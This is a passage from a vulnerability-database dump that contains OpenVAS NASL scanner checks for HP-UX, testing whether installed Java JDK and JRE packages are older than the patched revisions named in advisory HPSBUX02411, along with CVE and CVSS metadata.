ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:40:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5343", "CVE-2008-5348", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "description": "Check for the Version of Java", "modified": "2018-04-06T00:00:00", "published": "2009-05-05T00:00:00", "id": "OPENVAS:1361412562310835195", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835195", "type": "openvas", "title": "HP-UX Update for Java HPSBUX02411", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Java HPSBUX02411\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Multiple remote vulnerabilities\";\ntag_affected = \"Java on\n HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 6.0.02 or earlier \n HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 5.0.14 or earlier \n HP-UX B.11.11, B.11.23, B.11.31 running HP Java SDK and RTE 1.4.2.20 or \n earlier\";\ntag_insight = \"Potential security vulnerabilities have been identified in Java Runtime \n Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These \n vulnerabilities may allow remote unauthorized access, privilege escalation, \n execution of arbitrary code, and creation of a Denial of Service (DoS)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01683026-2\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835195\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"02411\");\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n script_name( \"HP-UX Update for Java HPSBUX02411\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of Java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", 